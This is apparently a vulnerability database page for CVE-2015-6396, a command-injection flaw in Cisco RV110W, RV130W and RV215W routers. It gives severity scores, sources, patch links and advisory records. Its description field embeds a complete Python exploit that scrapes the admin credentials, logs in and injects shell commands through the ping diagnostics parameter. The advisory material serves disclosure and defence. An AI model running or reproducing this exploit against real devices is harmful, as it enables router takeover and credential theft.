            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "id": "CVE-2015-6396",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2015-6396",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2015-6396",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2016-06162",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201608-173",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-84357",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-06162"
      },
      {
        "db": "VULHUB",
        "id": "VHN-84357"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007226"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201608-173"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-6396"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567. shell A command execution vulnerability exists. The Cisco RV110WRV130W and RV215W are Cisco router products. Multiple Cisco Products are prone to a local command-injection vulnerability. \nA local attacker can exploit this issue to execute arbitrary commands on the host operating system with root privileges. \nThis issue being tracked by Cisco Bug IDs CSCuv90134, CSCux58161 and CSCux73567. \nThe following products are affected:\nRV110W Wireless-N VPN Firewall\nRV130W Wireless-N Multifunction VPN Router\nRV215W Wireless-N VPN Router. #!/usr/bin/env python2\n\n#####\n## Cisco RV110W Password Disclosure and OS Command Execute. \n### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)\n\n# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute\n# Date: 2018-08\n# Exploit Author: RySh\n# Vendor Homepage: https://www.cisco.com/\n# Version: 1.1.0.9\n# Tested on: RV110W 1.1.0.9\n# CVE : CVE-2014-0683, CVE-2015-6396\n\nimport os\nimport sys\nimport re\nimport urllib\nimport urllib2\nimport getopt\nimport json\n\nimport ssl\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n###\n# Usage: ./{script_name} 192.168.1.1 443 \"reboot\"\n###\n\nif __name__ == \"__main__\":\n    IP = argv[1]\n    PORT = argv[2]\n    CMD = argv[3]\n    \n    # Get session key, Just access index page. \n    url = \u0027https://\u0027 + IP + \u0027:\u0027 + PORT + \u0027/\u0027\n    req = urllib2.Request(url)\n    result = urllib2.urlopen(req)\n    res = result.read()\n    \n    # parse \u0027admin_pwd\u0027! -- Get credits\n    admin_user = re.search(r\u0027.*(.*admin_name=\\\")(.*)\\\"\u0027, res).group().split(\"\\\"\")[1]\n    admin_pwd = re.search(r\u0027.*(.*admin_pwd=\\\")(.{32})\u0027, res).group()[-32:]\n    print \"Get Cred. Username = \" + admin_user + \", PassHash = \" + admin_pwd\n\n    # Get session_id by POST\n    req2 = urllib2.Request(url + \"login.cgi\")\n    req2.add_header(\u0027Origin\u0027, url)\n    req2.add_header(\u0027Upgrade-Insecure-Requests\u0027, 1)\n    req2.add_header(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027)\n    req2.add_header(\u0027User-Agent\u0027,\n                    \u0027Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)\u0027)\n    req2.add_header(\u0027Accept\u0027, \u0027text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\u0027)\n    req2.add_header(\u0027Referer\u0027, url)\n    req2.add_header(\u0027Accept-Encoding\u0027, \u0027gzip, deflate\u0027)\n    req2.add_header(\u0027Accept-Language\u0027, \u0027en-US,en;q=0.9\u0027)\n    req2.add_header(\u0027Cookie\u0027, \u0027SessionID=\u0027)\n    data = {\"submit_button\": \"login\",\n            \"submit_type\": \"\",\n            \"gui_action\": \"\",\n            \"wait_time\": \"0\",\n            \"change_action\": \"\",\n            \"enc\": \"1\",\n            \"user\": admin_user,\n            \"pwd\": admin_pwd,\n            \"sel_lang\": \"EN\"\n            }\n    r = urllib2.urlopen(req2, urllib.urlencode(data))\n    resp = r.read()\n    login_st = re.search(r\u0027.*login_st=\\d;\u0027, resp).group().split(\"=\")[1]\n    session_id = re.search(r\u0027.*session_id.*\\\";\u0027, resp).group().split(\"\\\"\")[1]\n\n    # Execute your commands via diagnose command parameter, default command is `reboot`\n    req3 = urllib2.Request(url + \"apply.cgi;session_id=\" + session_id)\n    req3.add_header(\u0027Origin\u0027, url)\n    req3.add_header(\u0027Upgrade-Insecure-Requests\u0027, 1)\n    req3.add_header(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027)\n    req3.add_header(\u0027User-Agent\u0027,\n                    \u0027Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)\u0027)\n    req3.add_header(\u0027Accept\u0027, \u0027text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\u0027)\n    req3.add_header(\u0027Referer\u0027, url)\n    req3.add_header(\u0027Accept-Encoding\u0027, \u0027gzip, deflate\u0027)\n    req3.add_header(\u0027Accept-Language\u0027, \u0027en-US,en;q=0.9\u0027)\n    req3.add_header(\u0027Cookie\u0027, \u0027SessionID=\u0027)\n    data_cmd = {\"submit_button\": \"Diagnostics\",\n            \"change_action\": \"gozila_cgi\",\n            \"submit_type\": \"start_ping\",\n            \"gui_action\": \"\",\n            \"traceroute_ip\": \"\",\n            \"commit\": \"1\",\n            \"ping_times\": \"3 |\" + CMD + \"|\",\n            \"ping_size\": \"64\",\n            \"wait_time\": \"4\",\n            \"ping_ip\": \"127.0.0.1\",\n            \"lookup_name\": \"\"\n            }\n    r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))\n            \n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-6396"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007226"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-06162"
      },
      {
        "db": "BID",
        "id": "92269"
      },
      {
        "db": "VULHUB",
        "id": "VHN-84357"
      },
      {
        "db": "PACKETSTORM",
        "id": "150781"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-6396",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "92269",
        "trust": 2.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "45986",
        "trust": 1.1
      },
      {
        "db": "SECTRACK",
        "id": "1036528",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007226",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201608-173",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2016.1890",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-06162",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-84357",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "150781",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-06162"
      },
      {
        "db": "VULHUB",
        "id": "VHN-84357"
      },
      {
        "db": "BID",
        "id": "92269"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007226"
      },
      {
        "db": "PACKETSTORM",
        "id": "150781"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201608-173"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-6396"
      }
    ]
  },
  "id": "VAR-201608-0273",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-06162"
      },
      {
        "db": "VULHUB",
        "id": "VHN-84357"
      }
    ],
    "trust": 1.233139435
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-06162"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:55:27.059000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "cisco-sa-20160803-rv110_130w1",
        "trust": 0.8,
        "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1"
      },
      {
        "title": "Patches for any command execution vulnerability in multiple Cisco products",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/80243"
      },
      {
        "title": "Cisco RV110W , RV130W  and RV215W Repair measures for device security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63566"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-06162"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007226"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201608-173"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-84357"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007226"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-6396"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160803-rv110_130w1"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/bid/92269"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/45986/"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1036528"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6396"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6396"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/render.html?it=37422"
      },
      {
        "trust": 0.4,
        "url": "http://www.cisco.com/"
      },
      {
        "trust": 0.1,
        "url": "https://\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0683"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6396"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-06162"
      },
      {
        "db": "VULHUB",
        "id": "VHN-84357"
      },
      {
        "db": "BID",
        "id": "92269"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007226"
      },
      {
        "db": "PACKETSTORM",
        "id": "150781"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201608-173"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-6396"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-06162"
      },
      {
        "db": "VULHUB",
        "id": "VHN-84357"
      },
      {
        "db": "BID",
        "id": "92269"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007226"
      },
      {
        "db": "PACKETSTORM",
        "id": "150781"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201608-173"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-6396"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-08-09T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-06162"
      },
      {
        "date": "2016-08-08T00:00:00",
        "db": "VULHUB",
        "id": "VHN-84357"
      },
      {
        "date": "2016-08-03T00:00:00",
        "db": "BID",
        "id": "92269"
      },
      {
        "date": "2016-08-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007226"
      },
      {
        "date": "2018-12-14T18:00:57",
        "db": "PACKETSTORM",
        "id": "150781"
      },
      {
        "date": "2016-08-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201608-173"
      },
      {
        "date": "2016-08-08T00:59:00.140000",
        "db": "NVD",
        "id": "CVE-2015-6396"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-08-09T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-06162"
      },
      {
        "date": "2018-12-15T00:00:00",
        "db": "VULHUB",
        "id": "VHN-84357"
      },
      {
        "date": "2016-08-03T00:00:00",
        "db": "BID",
        "id": "92269"
      },
      {
        "date": "2016-08-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007226"
      },
      {
        "date": "2016-08-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201608-173"
      },
      {
        "date": "2024-11-21T02:34:55.313000",
        "db": "NVD",
        "id": "CVE-2015-6396"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "92269"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201608-173"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "plural  Cisco Device product  CLI Any command with administrator privileges in the command parser  shell Command execution vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007226"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "operating system commend injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201608-173"
      }
    ],
    "trust": 0.6
  }
}

ghsa-v3jr-r4jq-v97q

Vulnerability from github

Published

2022-05-14 01:48

Modified

2022-05-14 01:48

Severity ?

7.8 (High) - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2015-6396"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-08-08T00:59:00Z",
    "severity": "HIGH"
  },
  "details": "The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567.",
  "id": "GHSA-v3jr-r4jq-v97q",
  "modified": "2022-05-14T01:48:31Z",
  "published": "2022-05-14T01:48:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-6396"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/45986"
    },
    {
      "type": "WEB",
      "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/92269"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1036528"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

cve-2015-6396

Vulnerability from cvelistv5

gsd-2015-6396

Vulnerability from gsd

var-201608-0273

Vulnerability from variot

Cisco RV110W Password Disclosure and OS Command Execute.

Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)

Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute

Date: 2018-08

Exploit Author: RySh

Vendor Homepage: https://www.cisco.com/

Version: 1.1.0.9

Tested on: RV110W 1.1.0.9

CVE : CVE-2014-0683, CVE-2015-6396

Usage: ./{script_name} 192.168.1.1 443 "reboot"

ghsa-v3jr-r4jq-v97q

Vulnerability from github

Tags

Sightings

Nomenclature